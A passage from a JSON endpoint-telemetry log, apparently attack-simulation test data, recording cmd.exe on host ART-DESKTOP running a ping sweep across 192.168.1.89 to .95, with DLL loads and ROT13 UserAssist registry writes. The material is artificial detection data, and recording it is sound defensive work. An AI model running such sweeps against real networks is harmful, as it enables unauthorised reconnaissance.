"{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572406980000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "event_type": "process", - "pid": 6788, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572411840000, - "unique_pid": "{42FC7E13-CB78-5C05-0000-0010BA635201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.89", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1748, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572411980000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "event_type": "process", - "pid": 1748, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572416990000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-001036665201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.90", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4832, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572417130000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417140000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417140000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417140000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417140000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417140000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417140000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417140000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417140000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417300000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417300000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572417300000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "event_type": "process", - "pid": 4832, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572421830000, - "unique_pid": "{42FC7E13-CB79-5C05-0000-0010A4685201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.91", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1532, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572421980000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883572426369984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883572426369984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 1532, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572426990000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010226B5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.92", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3068, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427140000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427300000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427300000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572427300000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "event_type": "process", - "pid": 3068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572431830000, - "unique_pid": "{42FC7E13-CB7A-5C05-0000-0010946D5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.93", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5088, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572431980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "event_type": "process", - "pid": 5088, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572436840000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001014705201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.94", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4036, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572436980000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572436990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "event_type": "process", - "pid": 4036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572441990000, - "unique_pid": "{42FC7E13-CB7B-5C05-0000-001082725201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.95", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2204, - "ppid": 